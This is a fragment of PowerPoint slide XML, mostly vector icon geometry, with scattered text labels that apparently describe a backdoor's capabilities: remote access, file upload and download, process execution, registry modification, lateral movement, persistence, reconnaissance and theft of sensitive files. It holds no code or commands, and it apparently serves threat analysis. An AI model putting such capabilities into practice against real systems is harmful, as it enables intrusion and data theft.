                  <a:pt x="42229" y="-5020"/>
                  <a:pt x="35515" y="13271"/>
                  <a:pt x="32221" y="30119"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="22589" y="30119"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="18416" y="30119"/>
                  <a:pt x="15059" y="33476"/>
                  <a:pt x="15059" y="37648"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="15059" y="41821"/>
                  <a:pt x="18416" y="45178"/>
                  <a:pt x="22589" y="45178"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="30119" y="45178"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="30119" y="55217"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="30119" y="60551"/>
                  <a:pt x="31154" y="65633"/>
                  <a:pt x="33036" y="70277"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="30119" y="70277"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="30119" y="70277"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23687" y="70277"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="18918" y="70277"/>
                  <a:pt x="15059" y="74136"/>
                  <a:pt x="15059" y="78904"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="15059" y="79846"/>
                  <a:pt x="15216" y="80755"/>
                  <a:pt x="15499" y="81634"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="24565" y="108803"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="12612" y="119094"/>
                  <a:pt x="5020" y="134310"/>
                  <a:pt x="5020" y="151314"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="5020" y="156460"/>
                  <a:pt x="9192" y="160632"/>
                  <a:pt x="14338" y="160632"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="126216" y="160632"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="131361" y="160632"/>
                  <a:pt x="135534" y="156460"/>
                  <a:pt x="135534" y="151314"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="135534" y="134310"/>
                  <a:pt x="127941" y="119094"/>
                  <a:pt x="115988" y="108835"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="125055" y="81665"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="125337" y="80787"/>
                  <a:pt x="125494" y="79877"/>
                  <a:pt x="125494" y="78936"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="125494" y="74167"/>
                  <a:pt x="121635" y="70308"/>
                  <a:pt x="116866" y="70308"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="110435" y="70308"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="110435" y="70308"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="107517" y="70308"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="109399" y="65665"/>
                  <a:pt x="110435" y="60582"/>
                  <a:pt x="110435" y="55249"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="110435" y="45209"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="117964" y="45209"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="122137" y="45209"/>
                  <a:pt x="125494" y="41852"/>
                  <a:pt x="125494" y="37680"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="125494" y="33507"/>
                  <a:pt x="122137" y="30150"/>
                  <a:pt x="117964" y="30150"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="108333" y="30150"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="105070" y="13302"/>
                  <a:pt x="98325" y="-4988"/>
                  <a:pt x="86905" y="-4988"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="83893" y="-4988"/>
                  <a:pt x="80944" y="-3765"/>
                  <a:pt x="78277" y="-2416"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="75704" y="-1129"/>
                  <a:pt x="72504" y="31"/>
                  <a:pt x="70277" y="31"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="68049" y="31"/>
                  <a:pt x="64849" y="-1129"/>
                  <a:pt x="62276" y="-2416"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="59610" y="-3796"/>
                  <a:pt x="56661" y="-5020"/>
                  <a:pt x="53649" y="-5020"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="83046" y="146954"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="75265" y="124710"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="84018" y="114513"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="84865" y="113509"/>
                  <a:pt x="85336" y="112254"/>
                  <a:pt x="85336" y="110937"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="85336" y="107894"/>
                  <a:pt x="82889" y="105446"/>
                  <a:pt x="79846" y="105446"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="60708" y="105446"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="57665" y="105446"/>
                  <a:pt x="55217" y="107894"/>
                  <a:pt x="55217" y="110937"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="55217" y="112254"/>
                  <a:pt x="55688" y="113509"/>
                  <a:pt x="56535" y="114513"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="65288" y="124710"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="57508" y="146954"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="39625" y="90356"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="50825" y="90356"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="56598" y="93556"/>
                  <a:pt x="63218" y="95375"/>
                  <a:pt x="70277" y="95375"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="77336" y="95375"/>
                  <a:pt x="83956" y="93556"/>
                  <a:pt x="89728" y="90356"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="100929" y="90356"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="83046" y="146954"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="70277" y="80316"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="59390" y="80316"/>
                  <a:pt x="50135" y="73383"/>
                  <a:pt x="46652" y="63688"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="48441" y="64692"/>
                  <a:pt x="50511" y="65257"/>
                  <a:pt x="52708" y="65257"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="56598" y="65257"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="61774" y="65257"/>
                  <a:pt x="66355" y="61931"/>
                  <a:pt x="67986" y="57037"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="68708" y="54841"/>
                  <a:pt x="71814" y="54841"/>
                  <a:pt x="72536" y="57037"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="74167" y="61931"/>
                  <a:pt x="78779" y="65257"/>
                  <a:pt x="83924" y="65257"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="87814" y="65257"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="90011" y="65257"/>
                  <a:pt x="92081" y="64692"/>
                  <a:pt x="93870" y="63688"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="90387" y="73383"/>
                  <a:pt x="81132" y="80316"/>
                  <a:pt x="70245" y="80316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9" name="Text 37"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8685997" y="1558134"/>
            <a:ext cx="1180648" cy="224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Remote Access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268352" y="1927589"/>
            <a:ext cx="3477692" cy="1028047"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="3477692" h="1028047">
                <a:moveTo>
                  <a:pt x="32126" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3445565" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="3463308" y="0"/>
                  <a:pt x="3477692" y="14384"/>
                  <a:pt x="3477692" y="32126"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="3477692" y="995921"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="3477692" y="1013664"/>
                  <a:pt x="3463308" y="1028047"/>
                  <a:pt x="3445565" y="1028047"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="32126" y="1028047"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="14384" y="1028047"/>
                  <a:pt x="0" y="1013664"/>
                  <a:pt x="0" y="995921"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="0" y="32126"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="14384"/>
                  <a:pt x="14384" y="0"/>
                  <a:pt x="32126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1" name="Text 39"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8364732" y="2023968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Remote Capabilities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364732" y="2216727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File upload/download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364732" y="2377360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Process execution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364732" y="2537992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Registry modification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364732" y="2698625"/>
            <a:ext cx="3341154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Service management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268352" y="3052016"/>
            <a:ext cx="3541945" cy="5782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2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remote administration capabilities enabling full system control, lateral movement, and persistence maintenance.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8268352" y="4675906"/>
            <a:ext cx="3477692" cy="6425"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="3477692" h="6425">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3477692" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3477692" y="6425"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="6425"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="4A4F59">
              <a:alpha val="4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8" name="Text 46"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8268352" y="4775504"/>
            <a:ext cx="3533913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Control Level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8268352" y="4968263"/>
            <a:ext cx="3549976" cy="224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38" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FB2C3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COMPLETE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324477" y="5421247"/>
            <a:ext cx="5708876" cy="2351658"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="5708876" h="2351658">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="5708876" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5708876" y="2351658"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2351658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10196"/>
            </a:srgbClr>
          </a:solidFill>
          <a:ln w="10160">
            <a:solidFill>
              <a:srgbClr val="E0A45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51" name="Shape 49"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="466236" y="5585090"/>
            <a:ext cx="180711" cy="160632"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="180711" h="160632">
                <a:moveTo>
                  <a:pt x="160758" y="75296"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="105541" y="75296"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="99987" y="75296"/>
                  <a:pt x="95501" y="70810"/>
                  <a:pt x="95501" y="65257"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="95501" y="10040"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="95501" y="4486"/>
                  <a:pt x="100019" y="-63"/>
                  <a:pt x="105509" y="659"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="139079" y="5114"/>
                  <a:pt x="165684" y="31719"/>
                  <a:pt x="170139" y="65288"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="170860" y="70779"/>
                  <a:pt x="166311" y="75296"/>
                  <a:pt x="160758" y="75296"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="69837" y="11671"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="75516" y="10479"/>
                  <a:pt x="80442" y="15122"/>
                  <a:pt x="80442" y="20926"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="80442" y="82826"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="80442" y="84583"/>
                  <a:pt x="81069" y="86277"/>
                  <a:pt x="82167" y="87626"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="123612" y="137636"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="127282" y="142059"/>
                  <a:pt x="126498" y="148742"/>
                  <a:pt x="121447" y="151471"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="110749" y="157307"/>
                  <a:pt x="98481" y="160632"/>
                  <a:pt x="85461" y="160632"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="43892" y="160632"/>
                  <a:pt x="10165" y="126906"/>
                  <a:pt x="10165" y="85336"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="10165" y="49100"/>
                  <a:pt x="35734" y="18855"/>
                  <a:pt x="69837" y="11671"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="149903" y="90356"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="169982" y="90356"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="175786" y="90356"/>
                  <a:pt x="180429" y="95281"/>
                  <a:pt x="179237" y="100960"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="176037" y="116145"/>
                  <a:pt x="168256" y="129635"/>
                  <a:pt x="157401" y="139926"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="153542" y="143597"/>
                  <a:pt x="147487" y="142812"/>
                  <a:pt x="144099" y="138702"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="117619" y="106795"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="112192" y="100238"/>
                  <a:pt x="116866" y="90356"/>
                  <a:pt x="125337" y="90356"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="149871" y="90356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2" name="Text 50"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="656987" y="5552964"/>
            <a:ext cx="5324964" cy="224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Backdoor Objectives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456196" y="5874228"/>
            <a:ext cx="2674530" cy="835289"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="2674530" h="835289">
                <a:moveTo>
                  <a:pt x="32125" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2642404" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="2660147" y="0"/>
                  <a:pt x="2674530" y="14383"/>
                  <a:pt x="2674530" y="32125"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="2674530" y="803163"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="2674530" y="820906"/>
                  <a:pt x="2660147" y="835289"/>
                  <a:pt x="2642404" y="835289"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="32125" y="835289"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="14383" y="835289"/>
                  <a:pt x="0" y="820906"/>
                  <a:pt x="0" y="803163"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="0" y="32125"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="14395"/>
                  <a:pt x="14395" y="0"/>
                  <a:pt x="32125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4" name="Shape 52"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1696077" y="5970608"/>
            <a:ext cx="192759" cy="192759"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="192759" h="192759">
                <a:moveTo>
                  <a:pt x="156617" y="78308"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="156617" y="95589"/>
                  <a:pt x="151007" y="111552"/>
                  <a:pt x="141557" y="124503"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="189220" y="172203"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="193926" y="176909"/>
                  <a:pt x="193926" y="184552"/>
                  <a:pt x="189220" y="189258"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="184514" y="193964"/>
                  <a:pt x="176871" y="193964"/>
                  <a:pt x="172165" y="189258"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="124503" y="141557"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="111552" y="151007"/>
                  <a:pt x="95589" y="156617"/>
                  <a:pt x="78308" y="156617"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="35050" y="156617"/>
                  <a:pt x="0" y="121566"/>
                  <a:pt x="0" y="78308"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="35050"/>
                  <a:pt x="35050" y="0"/>
                  <a:pt x="78308" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="121566" y="0"/>
                  <a:pt x="156617" y="35050"/>
                  <a:pt x="156617" y="78308"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="78308" y="132522"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="108230" y="132522"/>
                  <a:pt x="132522" y="108230"/>
                  <a:pt x="132522" y="78308"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="132522" y="48387"/>
                  <a:pt x="108230" y="24095"/>
                  <a:pt x="78308" y="24095"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="48387" y="24095"/>
                  <a:pt x="24095" y="48387"/>
                  <a:pt x="24095" y="78308"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="24095" y="108230"/>
                  <a:pt x="48387" y="132522"/>
                  <a:pt x="78308" y="132522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5" name="Text 53"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="520449" y="6227620"/>
            <a:ext cx="2546024" cy="192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Reconnaissance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24465" y="6452505"/>
            <a:ext cx="2537992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discovery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3225097" y="5874228"/>
            <a:ext cx="2674530" cy="835289"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="2674530" h="835289">
                <a:moveTo>
                  <a:pt x="32125" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2642404" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="2660147" y="0"/>
                  <a:pt x="2674530" y="14383"/>
                  <a:pt x="2674530" y="32125"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="2674530" y="803163"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="2674530" y="820906"/>
                  <a:pt x="2660147" y="835289"/>
                  <a:pt x="2642404" y="835289"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="32125" y="835289"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="14383" y="835289"/>
                  <a:pt x="0" y="820906"/>
                  <a:pt x="0" y="803163"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="0" y="32125"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="14395"/>
                  <a:pt x="14395" y="0"/>
                  <a:pt x="32125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8" name="Shape 56"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4477026" y="5970608"/>
            <a:ext cx="168664" cy="192759"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="168664" h="192759">
                <a:moveTo>
                  <a:pt x="168664" y="77480"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="163092" y="81170"/>
                  <a:pt x="156692" y="84144"/>
                  <a:pt x="150028" y="86516"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="132333" y="92841"/>
                  <a:pt x="109105" y="96379"/>
                  <a:pt x="84332" y="96379"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="59559" y="96379"/>
                  <a:pt x="36293" y="92803"/>
                  <a:pt x="18636" y="86516"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="12010" y="84144"/>
                  <a:pt x="5572" y="81170"/>
                  <a:pt x="0" y="77480"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="0" y="108427"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="125067"/>
                  <a:pt x="37761" y="138545"/>
                  <a:pt x="84332" y="138545"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="130903" y="138545"/>
                  <a:pt x="168664" y="125067"/>
                  <a:pt x="168664" y="108427"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="168664" y="77480"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="168664" y="48190"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="168664" y="30119"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="168664" y="13478"/>
                  <a:pt x="130903" y="0"/>
                  <a:pt x="84332" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="37761" y="0"/>
                  <a:pt x="0" y="13478"/>
                  <a:pt x="0" y="30119"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="0" y="48190"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="64830"/>
                  <a:pt x="37761" y="78308"/>
                  <a:pt x="84332" y="78308"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="130903" y="78308"/>
                  <a:pt x="168664" y="64830"/>
                  <a:pt x="168664" y="48190"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="150028" y="146753"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="132371" y="153040"/>
                  <a:pt x="109142" y="156617"/>
                  <a:pt x="84332" y="156617"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="59522" y="156617"/>
                  <a:pt x="36293" y="153040"/>
                  <a:pt x="18636" y="146753"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="12010" y="144381"/>
                  <a:pt x="5572" y="141407"/>
                  <a:pt x="0" y="137717"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="0" y="162640"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="179281"/>
                  <a:pt x="37761" y="192759"/>
                  <a:pt x="84332" y="192759"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="130903" y="192759"/>
                  <a:pt x="168664" y="179281"/>
                  <a:pt x="168664" y="162640"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="168664" y="137717"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="163092" y="141407"/>
                  <a:pt x="156692" y="144381"/>
                  <a:pt x="150028" y="14675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9" name="Text 57"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3289350" y="6227620"/>
            <a:ext cx="2546024" cy="192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Theft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3293366" y="6452505"/>
            <a:ext cx="2537992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Sensitive files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456196" y="6805896"/>
            <a:ext cx="2674530" cy="835289"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="2674530" h="835289">
                <a:moveTo>
                  <a:pt x="32125" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2642404" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="2660147" y="0"/>
                  <a:pt x="2674530" y="14383"/>
                  <a:pt x="2674530" y="32125"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="2674530" y="803163"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="2674530" y="820906"/>
                  <a:pt x="2660147" y="835289"/>
                  <a:pt x="2642404" y="835289"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="32125" y="835289"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="14383" y="835289"/>
                  <a:pt x="0" y="820906"/>
                  <a:pt x="0" y="803163"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="0" y="32125"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="14395"/>
                  <a:pt x="14395" y="0"/>
                  <a:pt x="32125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2" name="Shape 60"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1684030" y="6902276"/>
            <a:ext cx="216854" cy="192759"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="216854" h="192759">
                <a:moveTo>
                  <a:pt x="93368" y="33130"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="123486" y="33130"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="123486" y="51202"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="93368" y="51202"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="93368" y="33130"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="90356" y="12047"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="80379" y="12047"/>
                  <a:pt x="72285" y="20142"/>
                  <a:pt x="72285" y="30119"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="72285" y="54213"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="72285" y="64190"/>
                  <a:pt x="80379" y="72285"/>
                  <a:pt x="90356" y="72285"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="96379" y="72285"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="96379" y="84332"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12047" y="84332"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="5384" y="84332"/>
                  <a:pt x="0" y="89716"/>
                  <a:pt x="0" y="96379"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="103043"/>
                  <a:pt x="5384" y="108427"/>
                  <a:pt x="12047" y="108427"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="48190" y="108427"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="48190" y="120474"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="42166" y="120474"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="32189" y="120474"/>
                  <a:pt x="24095" y="128569"/>
                  <a:pt x="24095" y="138545"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="24095" y="162640"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="24095" y="172617"/>
                  <a:pt x="32189" y="180711"/>
                  <a:pt x="42166" y="180711"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="78308" y="180711"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="88285" y="180711"/>
                  <a:pt x="96379" y="172617"/>
                  <a:pt x="96379" y="162640"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="96379" y="138545"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="96379" y="128569"/>
                  <a:pt x="88285" y="120474"/>
